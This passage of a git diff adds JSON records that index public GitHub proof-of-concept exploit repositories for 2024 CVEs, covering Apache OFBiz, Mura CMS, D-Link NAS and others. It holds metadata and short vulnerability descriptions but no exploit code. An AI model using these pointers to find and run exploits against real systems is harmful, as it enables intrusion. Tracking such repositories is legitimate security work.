"https:\/\/github.com\/Cerberus-HiproPlus\/CVE-2024-32104", + "description": null, + "fork": false, + "created_at": "2024-07-31T12:20:07Z", + "updated_at": "2024-08-01T07:08:09Z", + "pushed_at": "2024-08-01T07:08:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32113.json b/2024/CVE-2024-32113.json new file mode 100644 index 0000000000..5c737512c8 --- /dev/null +++ b/2024/CVE-2024-32113.json @@ -0,0 +1,136 @@ +[ + { + "id": 784744024, + "name": "CVE-2024-32113-POC", + "full_name": "RacerZ-fighting\/CVE-2024-32113-POC", + "owner": { + "login": "RacerZ-fighting", + "id": 78632303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78632303?v=4", + "html_url": "https:\/\/github.com\/RacerZ-fighting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RacerZ-fighting\/CVE-2024-32113-POC", + "description": "Apache OfBiz vulns", + "fork": false, + "created_at": "2024-04-10T13:22:11Z", + "updated_at": "2024-12-26T06:26:45Z", + "pushed_at": "2024-08-05T06:40:47Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809872637, + "name": "CVE-2024-32113", + "full_name": "Mr-xn\/CVE-2024-32113", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2024-32113", + "description": "Apache OFBIZ Path traversal leading to RCE POC[CVE-2024-32113 & CVE-2024-36104]", + "fork": false, + "created_at": "2024-06-03T15:57:59Z", + "updated_at": "2024-11-21T05:20:25Z", + "pushed_at": "2024-06-03T16:13:49Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve", + "cve-2024", + "cve-2024-32113", + "cve-2024-36104", + "ofbiz", + "poc", + "rce", + "rce-exploit" + ], + "visibility": "public", + "forks": 8, + "watchers": 24, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 839216934, + "name": "CVE-2024-32113", + "full_name": "YongYe-Security\/CVE-2024-32113", + "owner": { + "login": "YongYe-Security", + "id": 90460865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90460865?v=4", + "html_url": "https:\/\/github.com\/YongYe-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YongYe-Security\/CVE-2024-32113", + "description": "CVE-2024-32113 Apache OFBIZ Batch Scanning", + "fork": false, + "created_at": "2024-08-07T07:12:56Z", + "updated_at": "2024-11-30T07:58:18Z", + "pushed_at": "2024-08-07T07:16:26Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 907739057, + "name": "CVE-2024-32113", + "full_name": "MikeyPPPPPPPP\/CVE-2024-32113", + "owner": { + "login": "MikeyPPPPPPPP", + "id": 50926811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50926811?v=4", + "html_url": "https:\/\/github.com\/MikeyPPPPPPPP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MikeyPPPPPPPP\/CVE-2024-32113", + "description": "CVE-2024-32113 PoC", + "fork": false, + "created_at": "2024-12-24T09:16:23Z", + "updated_at": "2024-12-25T03:04:01Z", + "pushed_at": "2024-12-25T03:03:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32136.json b/2024/CVE-2024-32136.json new file mode 100644 index 0000000000..f411425a49 --- /dev/null +++ b/2024/CVE-2024-32136.json @@ -0,0 +1,33 @@ +[ + { + "id": 796233073, + "name": "CVE-2024-32136", + "full_name": "xbz0n\/CVE-2024-32136", + "owner": { + "login": "xbz0n", + "id": 40547674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40547674?v=4", + "html_url": "https:\/\/github.com\/xbz0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xbz0n\/CVE-2024-32136", + "description": null, + "fork": false, + "created_at": "2024-05-05T10:49:08Z", + "updated_at": "2024-07-21T12:00:00Z", + "pushed_at": "2024-05-05T11:00:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3217.json b/2024/CVE-2024-3217.json new file mode 100644 index 0000000000..81f4c59671 --- /dev/null +++ b/2024/CVE-2024-3217.json @@ -0,0 +1,33 @@ +[ + { + "id": 787948963, + "name": "CVE-2024-3217-POC", + "full_name": "BassamAssiri\/CVE-2024-3217-POC", + "owner": { + "login": "BassamAssiri", + "id": 59013588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59013588?v=4", + "html_url": "https:\/\/github.com\/BassamAssiri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BassamAssiri\/CVE-2024-3217-POC", + "description": null, + "fork": false, + "created_at": "2024-04-17T13:43:57Z", + "updated_at": "2024-05-08T22:44:10Z", + "pushed_at": "2024-04-17T14:15:05Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32205.json b/2024/CVE-2024-32205.json new file mode 100644 index 0000000000..68dc9909cc --- /dev/null +++ b/2024/CVE-2024-32205.json @@ -0,0 +1,33 @@ +[ + { + "id": 789261382, + "name": "CVE-2024-32205", + "full_name": "Lucky-lm\/CVE-2024-32205", + "owner": { + "login": "Lucky-lm", + "id": 104305063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104305063?v=4", + "html_url": "https:\/\/github.com\/Lucky-lm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lucky-lm\/CVE-2024-32205", + "description": null, + "fork": false, + "created_at": "2024-04-20T04:11:19Z", + "updated_at": "2024-04-20T04:11:19Z", + "pushed_at": "2024-04-20T04:11:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32238.json b/2024/CVE-2024-32238.json new file mode 100644 index 0000000000..04768b95b9 --- /dev/null +++ b/2024/CVE-2024-32238.json @@ -0,0 +1,64 @@ +[ + { + "id": 789258062, + "name": "CVE-2024-32238", + "full_name": "asdfjkl11\/CVE-2024-32238", + "owner": { + "login": "asdfjkl11", + "id": 96732416, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96732416?v=4", + "html_url": "https:\/\/github.com\/asdfjkl11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asdfjkl11\/CVE-2024-32238", + "description": null, + "fork": false, + "created_at": "2024-04-20T03:55:21Z", + "updated_at": "2024-04-20T03:55:22Z", + "pushed_at": "2024-04-20T03:55:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789466929, + "name": "CVE-2024-32238", + "full_name": "FuBoLuSec\/CVE-2024-32238", + "owner": { + "login": "FuBoLuSec", + "id": 156916644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156916644?v=4", + "html_url": "https:\/\/github.com\/FuBoLuSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FuBoLuSec\/CVE-2024-32238", + "description": "H3C ER8300G2-X config download", + "fork": false, + "created_at": "2024-04-20T16:23:10Z", + "updated_at": "2024-04-20T16:28:56Z", + "pushed_at": "2024-04-20T16:28:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32258.json b/2024/CVE-2024-32258.json new file mode 100644 index 0000000000..391bb29f0e --- /dev/null +++ b/2024/CVE-2024-32258.json @@ -0,0 +1,33 @@ +[ + { + "id": 788568781, + "name": "CVE-2024-32258", + "full_name": "liyansong2018\/CVE-2024-32258", + "owner": { + "login": "liyansong2018", + "id": 25031216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25031216?v=4", + "html_url": "https:\/\/github.com\/liyansong2018", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/liyansong2018\/CVE-2024-32258", + "description": null, + "fork": false, + "created_at": "2024-04-18T17:07:07Z", + "updated_at": "2024-11-29T02:13:43Z", + "pushed_at": "2024-11-01T15:36:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32369.json b/2024/CVE-2024-32369.json new file mode 100644 index 0000000000..57daf1b7f5 --- /dev/null +++ b/2024/CVE-2024-32369.json @@ -0,0 +1,33 @@ +[ + { + "id": 796814769, + "name": "CVE-2024-32369", + "full_name": "chucrutis\/CVE-2024-32369", + "owner": { + "login": "chucrutis", + "id": 17951072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17951072?v=4", + "html_url": "https:\/\/github.com\/chucrutis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chucrutis\/CVE-2024-32369", + "description": "Description: SQL Injection vulnerability in HSC Cybersecurity HSC Mailinspector v.5.2.17-3 allows a remote attacker to obtain sensitive information via a crafted payload to the start and limit parameter in the mliWhiteList.php component.", + "fork": false, + "created_at": "2024-05-06T17:22:15Z", + "updated_at": "2024-06-06T17:25:35Z", + "pushed_at": "2024-05-06T17:22:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32370.json b/2024/CVE-2024-32370.json new file mode 100644 index 0000000000..2f51953664 --- /dev/null +++ b/2024/CVE-2024-32370.json @@ -0,0 +1,33 @@ +[ + { + "id": 796817594, + "name": "CVE-2024-32370", + "full_name": "chucrutis\/CVE-2024-32370", + "owner": { + "login": "chucrutis", + "id": 17951072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17951072?v=4", + "html_url": "https:\/\/github.com\/chucrutis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chucrutis\/CVE-2024-32370", + "description": "An issue in HSC Cybersecurity HSC Mailinspector version 5.2.17-3 has been identified, allowing a remote attacker to obtain sensitive information via a crafted payload to the id parameter in the mliSystemUsers.php component.", + "fork": false, + "created_at": "2024-05-06T17:28:57Z", + "updated_at": "2024-06-06T17:23:55Z", + "pushed_at": "2024-05-06T18:50:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32371.json b/2024/CVE-2024-32371.json new file mode 100644 index 0000000000..deb3682d89 --- /dev/null +++ b/2024/CVE-2024-32371.json @@ -0,0 +1,33 @@ +[ + { + "id": 796823130, + "name": "CVE-2024-32371", + "full_name": "chucrutis\/CVE-2024-32371", + "owner": { + "login": "chucrutis", + "id": 17951072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17951072?v=4", + "html_url": "https:\/\/github.com\/chucrutis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chucrutis\/CVE-2024-32371", + "description": "A vulnerability identified as CVE-2024-32371 allows an attacker to elevate privileges by changing the type parameter from 1 to 0. This vulnerability enables an attacker with a regular user account to escalate their privileges and gain administrative access to the system.", + "fork": false, + "created_at": "2024-05-06T17:41:06Z", + "updated_at": "2024-06-06T17:25:16Z", + "pushed_at": "2024-05-06T18:21:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32399.json b/2024/CVE-2024-32399.json new file mode 100644 index 0000000000..73fbe38fd2 --- /dev/null +++ b/2024/CVE-2024-32399.json @@ -0,0 +1,33 @@ +[ + { + "id": 790269006, + "name": "CVE-2024-32399", + "full_name": "NN0b0dy\/CVE-2024-32399", + "owner": { + "login": "NN0b0dy", + "id": 166635896, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166635896?v=4", + "html_url": "https:\/\/github.com\/NN0b0dy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NN0b0dy\/CVE-2024-32399", + "description": null, + "fork": false, + "created_at": "2024-04-22T15:15:37Z", + "updated_at": "2024-04-22T15:16:26Z", + "pushed_at": "2024-04-22T15:16:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32459.json b/2024/CVE-2024-32459.json new file mode 100644 index 0000000000..0e07c5414b --- /dev/null +++ b/2024/CVE-2024-32459.json @@ -0,0 +1,33 @@ +[ + { + "id": 804159088, + "name": "FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-", + "full_name": "absholi7ly\/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-", + "owner": { + "login": "absholi7ly", + "id": 72062217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4", + "html_url": "https:\/\/github.com\/absholi7ly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absholi7ly\/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-", + "description": "The FreeRDP - Out-of-Bounds Read (CVE-2024-32459) vulnerability concerns FreeRDP, a free implementation of Remote Desktop Protocol. FreeRDP-based clients and servers using a version of FreeRDP prior to version 3.5.0 or 2.11.6 are vulnerable to out-of-bounds reading12. Versions 3.5.0 and 2.11.6 correct the problem", + "fork": false, + "created_at": "2024-05-22T04:19:27Z", + "updated_at": "2024-06-01T00:12:41Z", + "pushed_at": "2024-05-22T04:30:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32523.json b/2024/CVE-2024-32523.json new file mode 100644 index 0000000000..cfd96f4daa --- /dev/null +++ b/2024/CVE-2024-32523.json @@ -0,0 +1,33 @@ +[ + { + "id": 799304116, + "name": "CVE-2024-32523-Poc", + "full_name": "truonghuuphuc\/CVE-2024-32523-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-32523-Poc", + "description": "CVE-2024-32523 Mailster <= 4.0.6 - Unauthenticated Local File Inclusion", + "fork": false, + "created_at": "2024-05-11T18:16:31Z", + "updated_at": "2024-06-26T12:03:42Z", + "pushed_at": "2024-05-11T18:59:22Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32640.json b/2024/CVE-2024-32640.json new file mode 100644 index 0000000000..bd3f2fd7de --- /dev/null +++ b/2024/CVE-2024-32640.json @@ -0,0 +1,138 @@ +[ + { + "id": 801300321, + "name": "CVE-2024-32640-SQLI-MuraCMS", + "full_name": "Stuub\/CVE-2024-32640-SQLI-MuraCMS", + "owner": { + "login": "Stuub", + "id": 60468836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4", + "html_url": "https:\/\/github.com\/Stuub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stuub\/CVE-2024-32640-SQLI-MuraCMS", + "description": "CVE-2024-32640 | Automated SQLi Exploitation PoC", + "fork": false, + "created_at": "2024-05-16T01:02:32Z", + "updated_at": "2024-12-12T13:46:58Z", + "pushed_at": "2024-05-16T21:07:32Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve", + "cve-2024", + "cve-2024-32640", + "cve-2024-32640-poc", + "exploit", + "masacms", + "muracms", + "poc", + "rce", + "sqli" + ], + "visibility": "public", + "forks": 11, + "watchers": 61, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802083233, + "name": "CVE-2024-32640-SQLI-MuraCMS", + "full_name": "0xYumeko\/CVE-2024-32640-SQLI-MuraCMS", + "owner": { + "login": "0xYumeko", + "id": 154844497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154844497?v=4", + "html_url": "https:\/\/github.com\/0xYumeko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xYumeko\/CVE-2024-32640-SQLI-MuraCMS", + "description": null, + "fork": false, + "created_at": "2024-05-17T13:43:59Z", + "updated_at": "2024-06-01T18:21:22Z", + "pushed_at": "2024-05-17T13:54:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811262145, + "name": "CVE-2024-32640", + "full_name": "sammings\/CVE-2024-32640", + "owner": { + "login": "sammings", + "id": 149979829, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149979829?v=4", + "html_url": "https:\/\/github.com\/sammings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sammings\/CVE-2024-32640", + "description": "sql延时注入poc", + "fork": false, + "created_at": "2024-06-06T08:56:34Z", + "updated_at": "2024-06-06T08:58:13Z", + "pushed_at": "2024-06-06T08:58:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887494835, + "name": "CVE-2024-32640", + "full_name": "pizza-power\/CVE-2024-32640", + "owner": { + "login": "pizza-power", + "id": 6135659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6135659?v=4", + "html_url": "https:\/\/github.com\/pizza-power", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pizza-power\/CVE-2024-32640", + "description": "Python POC for CVE-2024-32640 Mura CMS SQLi", + "fork": false, + "created_at": "2024-11-12T20:50:11Z", + "updated_at": "2024-11-16T12:30:55Z", + "pushed_at": "2024-11-15T16:30:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32651.json b/2024/CVE-2024-32651.json new file mode 100644 index 0000000000..65a4c49718 --- /dev/null +++ b/2024/CVE-2024-32651.json @@ -0,0 +1,64 @@ +[ + { + "id": 806279478, + "name": "cve-2024-32651", + "full_name": "zcrosman\/cve-2024-32651", + "owner": { + "login": "zcrosman", + "id": 21688962, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21688962?v=4", + "html_url": "https:\/\/github.com\/zcrosman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zcrosman\/cve-2024-32651", + "description": "changedetection rce though ssti", + "fork": false, + "created_at": "2024-05-26T21:24:14Z", + "updated_at": "2024-10-28T13:48:04Z", + "pushed_at": "2024-05-26T21:42:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 858185537, + "name": "CVE-2024-32651-changedetection-RCE", + "full_name": "s0ck3t-s3c\/CVE-2024-32651-changedetection-RCE", + "owner": { + "login": "s0ck3t-s3c", + "id": 181068619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/181068619?v=4", + "html_url": "https:\/\/github.com\/s0ck3t-s3c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s0ck3t-s3c\/CVE-2024-32651-changedetection-RCE", + "description": "Server-Side Template Injection Exploit", + "fork": false, + "created_at": "2024-09-16T13:11:38Z", + "updated_at": "2024-10-28T13:56:04Z", + "pushed_at": "2024-09-18T09:16:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32700.json b/2024/CVE-2024-32700.json new file mode 100644 index 0000000000..df3ee36565 --- /dev/null +++ b/2024/CVE-2024-32700.json @@ -0,0 +1,33 @@ +[ + { + "id": 837513457, + "name": "CVE-2024-32700", + "full_name": "nastar-id\/CVE-2024-32700", + "owner": { + "login": "nastar-id", + "id": 57721604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57721604?v=4", + "html_url": "https:\/\/github.com\/nastar-id", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nastar-id\/CVE-2024-32700", + "description": null, + "fork": false, + "created_at": "2024-08-03T07:41:30Z", + "updated_at": "2024-08-05T17:20:40Z", + "pushed_at": "2024-08-05T17:20:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32709.json b/2024/CVE-2024-32709.json new file mode 100644 index 0000000000..613746cbca --- /dev/null +++ b/2024/CVE-2024-32709.json @@ -0,0 +1,33 @@ +[ + { + "id": 796349926, + "name": "CVE-2024-32709-Poc", + "full_name": "truonghuuphuc\/CVE-2024-32709-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-32709-Poc", + "description": "CVE-2024-32709 WP-Recall – Registration, Profile, Commerce & More <= 16.26.5 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-05-05T17:21:55Z", + "updated_at": "2024-07-04T06:16:17Z", + "pushed_at": "2024-05-06T16:17:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3272.json b/2024/CVE-2024-3272.json new file mode 100644 index 0000000000..20d2dafc23 --- /dev/null +++ b/2024/CVE-2024-3272.json @@ -0,0 +1,64 @@ +[ + { + "id": 783750436, + "name": "D-Link-NAS-Devices-Unauthenticated-RCE", + "full_name": "nickswink\/D-Link-NAS-Devices-Unauthenticated-RCE", + "owner": { + "login": "nickswink", + "id": 57839593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57839593?v=4", + "html_url": "https:\/\/github.com\/nickswink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nickswink\/D-Link-NAS-Devices-Unauthenticated-RCE", + "description": "UNTESTED exploit script for CVE-2024-3272 + CVE-2024-3273. The script exploits a backdoor authentication bypass + arbitrary command injection vulnerability. ", + "fork": false, + "created_at": "2024-04-08T13:54:07Z", + "updated_at": "2024-07-29T21:52:56Z", + "pushed_at": "2024-04-08T13:57:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803710130, + "name": "dinkleberry", + "full_name": "aliask\/dinkleberry", + "owner": { + "login": "aliask", + "id": 6219869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6219869?v=4", + "html_url": "https:\/\/github.com\/aliask", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aliask\/dinkleberry", + "description": "Patch your D-Link device affected by CVE-2024-3272 ", + "fork": false, + "created_at": "2024-05-21T08:40:37Z", + "updated_at": "2024-05-25T00:36:53Z", + "pushed_at": "2024-05-25T00:36:49Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3273.json b/2024/CVE-2024-3273.json new file mode 100644 index 0000000000..34bf97cac1 --- /dev/null +++ b/2024/CVE-2024-3273.json @@ -0,0 +1,297 @@ +[ + { + "id": 783134888, + "name": "CVE-2024-3273", + "full_name": "Chocapikk\/CVE-2024-3273", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-3273", + "description": "D-Link NAS CVE-2024-3273 Exploit Tool", + "fork": false, + "created_at": "2024-04-07T03:09:13Z", + "updated_at": "2024-12-24T14:46:13Z", + "pushed_at": "2024-04-07T04:41:26Z", + "stargazers_count": 93, + "watchers_count": 93, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 93, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 783329699, + "name": "CVE-2024-3273", + "full_name": "adhikara13\/CVE-2024-3273", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2024-3273", + "description": "Exploit for CVE-2024-3273, supports single and multiple hosts", + "fork": false, + "created_at": "2024-04-07T15:36:18Z", + "updated_at": "2024-10-17T12:54:48Z", + "pushed_at": "2024-04-07T15:41:42Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 783429302, + "name": "honeypot-dlink-CVE-2024-3273", + "full_name": "yarienkiva\/honeypot-dlink-CVE-2024-3273", + "owner": { + "login": "yarienkiva", + "id": 42248482, + "avatar_url": 